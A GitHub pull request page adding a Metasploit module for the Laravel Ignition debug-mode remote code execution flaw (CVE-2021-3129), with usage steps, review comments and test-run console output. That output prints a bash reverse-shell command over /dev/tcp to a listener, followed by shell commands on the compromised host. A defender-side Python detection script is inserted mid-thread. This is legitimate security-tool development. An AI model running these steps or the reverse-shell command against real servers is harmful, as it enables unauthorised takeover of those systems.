
Add module to CVE-2021-3129 #16159

Merged
merged 14 commits into from
Feb 15, 2022
Merged

Conversation

heyder
Contributor

@heyder heyder commented Feb 8, 2022

This module exploits a vulnerability in Ignition before 2.5.2,
as used in Laravel and other products, allows unauthenticated
remote attackers to execute arbitrary code because of insecure
usage of file_get_contents() and file_put_contents().
This is exploitable on sites using debug mode with Laravel before 8.4.2.

This module has been tested successfully on Debian 10.7 (x86_64) with
kernel version 5.10.60.

Verification

List the steps needed to make sure this thing works

  • Create the log file manually in /var/www/storage/logs/laravel.log
    if using the below-mentioned container
  • Start msfconsole
  • use exploit/multi/php/ignition_laravel_debug_rc
  • set RHOSTS
  • set RPORT
  • set LHOST
  • exploit

Environment

This module was tested using a vulnerable docker container
as available on the vulnhub project. However this container doesn't come
with the required log file created. It needs to be created
manually in the path /var/www/storage/logs/laravel.log.

Even though the compose file from this container says laravel:8.4.2 on
my environment it was deployed with the version 8.26.1. I also didn't find the
release 8.4.2 in the Laravel repository.

Software versions

PHP 7.4.1
Laravel Framework 8.26.1
Ignition 2.5.1
Debian 10.7

Output

msf6 exploit(multi/php/ignition_laravel_debug_rce) > exploit

[+] bash -c '0<&65-;exec 65<>/dev/tcp/172.28.241.244/4444;sh <&65 >&65 2>&65'
[*] Started reverse TCP handler on 172.28.241.244:4444
[*] Checking component version to 172.28.240.1:8080
[*] Debug mode is enabled.
[*] Found PHP 7.4.15 running Laravel 8.26.1
[*] Found log file /var/www/storage/logs/laravel.log
[*] Command shell session 2 opened (172.28.241.244:4444 -> 172.28.240.1:56840 ) at 2022-02-08 11:32:12 +0100

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
php /var/www/artisan --version
Laravel Framework 8.26.1
head ../vendor/facade/ignition/CHANGELOG.md
# Changelog

All notable changes to `ignition` will be documented in this file

## 2.5.1 - 2020-11-13

- add support for LiveWire component urls

## 2.5.0 - 2020-10-27

uname -a
Linux 9f96df025a2b 5.10.60.1-microsoft-standard-WSL2 #1 SMP Wed Aug 25 23:20:18 UTC 2021 x86_64 GNU/Linux
cat /etc/debian_version
10.7
exit
[*] 172.28.240.1 - Command shell session 2 closed.

@github-actions

github-actions bot commented Feb 8, 2022

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@smcintyre-r7 smcintyre-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Feb 8, 2022
@github-actions

github-actions bot commented Feb 8, 2022

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@bcoles bcoles added docs and removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Feb 8, 2022
heyder and others added 4 commits February 10, 2022 20:08
As we can't determine with certainty whether the target is vulnerable, the check method should return Appears instead of Vulnerable.

Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
Cases
[x] User defined wrong log file
    [-] Exploit aborted due to failure: unexpected-reply: Log file /var/www/log.log seems doesn't exit
[x] Module doesn't detect the log file
    [-] Log file does not exist /var/www/storage/logs/laravel.log
    [-] Exploit aborted due to failure: bad-config: Log file is required, however it was defined nor it was not automatically detecte
[x] Site doesn't respond with error, module unable to find the log directory
    [-] Unable to automatically find the log file. To continue set LOGPATH manually
    [-] Exploit aborted due to failure: bad-config: Log file is required, however it was defined nor it was not automatically detected
[x] Site with debug mode false
    [-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result
Update option name from LOGPATH to LOGFILE to become more intuitive.
- Removed else statements from check in favor of implicit return
- Added comment explaining the check strategy (to be less intrusive)
@bwatters-r7 bwatters-r7 self-assigned this Feb 14, 2022
@bwatters-r7
Contributor

Test

msf6 exploit(multi/php/ignition_laravel_debug_rce) > show options

Module options (exploit/multi/php/ignition_laravel_debug_rce):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   LOGFILE                                 no        Laravel log file absolute path
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
                                                     ing-Metasploit
   RPORT      80                           yes       The target port (TCP)
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /_ignition/execute-solution  yes       Ignition execute solution path
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(multi/php/ignition_laravel_debug_rce) > set verbose true
verbose => true
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set rhost 10.5.134.153
rhost => 10.5.134.153
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set rport 8080
rport => 8080
msf6 exploit(multi/php/ignition_laravel_debug_rce) > set lhost 10.5.135.101
lhost => 10.5.135.101
msf6 exploit(multi/php/ignition_laravel_debug_rce) > run

[+] bash -c '0<&100-;exec 100<>/dev/tcp/10.5.135.101/4444;sh <&100 >&100 2>&100'
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking component version to 10.5.134.153:8080
[*] Debug mode is enabled.
[*] Found PHP 7.4.15 running Laravel 8.26.1
[+] The target appears to be vulnerable.
[*] Trying to detect log file
[*] Found directory canditate /var/www
[*] Cheking if /var/www/storage/logs/laravel.log exists
[*] Found log file /var/www/storage/logs/laravel.log
[*] Command shell session 1 opened (10.5.135.101:4444 -> 10.5.134.153:40438 ) at 2022-02-14 16:31:29 -0600
id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
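The test run above shows the two conditions the module depends on: the Ignition solution endpoint (TARGETURI /_ignition/execute-solution) is reachable, and the application reports "Debug mode is enabled". From the defender's side those same two facts are what to check for. The following script is an added example for this thread, not code from the Metasploit module or from Laravel/Ignition. It assumes (none of this is stated on the page) that the web server writes Combined Log Format access logs, that the application keeps APP_DEBUG in a .env file, and that dependencies are pinned in a composer.lock listing facade/ignition. It flags requests to the Ignition endpoint in access logs, reports whether debug mode is on, and compares the installed Ignition version against the 2.5.2 fix the PR description names; the sample log lines, .env and lock file are constructed.

```python
"""Defender-side checks for the Ignition/Laravel issue discussed in this PR.

Added example for this thread, not code from the Metasploit module or from
Laravel/Ignition. Assumptions (not stated on the page): Combined Log Format
access logs, APP_DEBUG kept in a .env file, dependencies pinned in composer.lock.
"""
import json
import re

# Endpoint the module posts to (TARGETURI in the module options above).
IGNITION_ENDPOINT = "/_ignition/execute-solution"
# First Ignition release named as fixed in the PR description.
FIXED_IGNITION = (2, 5, 2)

# Combined Log Format: host ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def find_ignition_requests(lines):
    """Return one (host, time, method, path, status) tuple per request to the
    Ignition solution endpoint. Normal site traffic never calls it, so a hit
    from an address that is not a developer workstation deserves an alert."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        path = m.group("path").split("?", 1)[0].rstrip("/")
        if path == IGNITION_ENDPOINT:
            hits.append((m.group("host"), m.group("time"), m.group("method"),
                         path, int(m.group("status"))))
    return hits


def debug_mode_enabled(env_text):
    """True if APP_DEBUG in the given .env content is set to a truthy value.
    Laravel's env() maps 'true' and '(true)' to boolean true; an absent key
    falls back to the framework default of false."""
    for raw in env_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip() == "APP_DEBUG":
            value = value.strip().strip('"').strip("'").lower()
            return value in ("true", "(true)", "1")
    return False


def ignition_version(composer_lock_text):
    """Installed facade/ignition version as an int tuple, or None if absent."""
    lock = json.loads(composer_lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        if pkg.get("name") == "facade/ignition":
            parts = pkg["version"].lstrip("v").split(".")
            # keep only the leading digits of each component (handles "2.5.1-beta")
            return tuple(int(re.match(r"\d+", p).group()) for p in parts[:3])
    return None


def ignition_vulnerable(composer_lock_text):
    """Vulnerable build if facade/ignition is present and older than 2.5.2."""
    version = ignition_version(composer_lock_text)
    return version is not None and version < FIXED_IGNITION


# --- constructed sample inputs (not captured from any real system) ---
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Feb/2022:11:32:10 +0100] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [08/Feb/2022:11:32:11 +0100] "POST /_ignition/execute-solution HTTP/1.1" 200 55 "-" "python-requests/2.27"',
    '203.0.113.7 - - [08/Feb/2022:11:32:12 +0100] "POST /_ignition/execute-solution/ HTTP/1.1" 500 0 "-" "python-requests/2.27"',
    'not a log line at all',
]
SAMPLE_ENV = "APP_NAME=Shop\nAPP_ENV=production\n# APP_DEBUG=false\nAPP_DEBUG=true\n"
SAMPLE_LOCK = json.dumps({"packages": [{"name": "facade/ignition", "version": "2.5.1"}]})

if __name__ == "__main__":
    for hit in find_ignition_requests(SAMPLE_LOG):
        print("ignition endpoint hit:", hit)
    print("APP_DEBUG enabled:", debug_mode_enabled(SAMPLE_ENV))
    print("ignition vulnerable:", ignition_vulnerable(SAMPLE_LOCK))
```

The log check matches on the normalised path only, so a trailing slash or query string does not hide a request; the .env check mirrors the module's own "Debug mode is enabled" condition, which is the setting that has to be false in production for the endpoint not to exist at all.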

Contributor

@bwatters-r7 bwatters-r7 left a comment


Hey there- thanks so much for your submission! I only have a few minor suggestions.

heyder and others added 5 commits February 15, 2022 08:46
Fix typos

Co-authored-by: Brendan <bwatters@rapid7.com>
Fix typos

Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
@bwatters-r7 bwatters-r7 merged commit 1086926 into rapid7:master Feb 15, 2022
@bwatters-r7
Contributor

Release Notes

This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().

@heyder heyder deleted the ignition_laravel_debug_rce branch February 16, 2022 08:17
@ebleiweiss-r7 ebleiweiss-r7 added the rn-modules release notes for new or majorly enhanced modules label Feb 18, 2022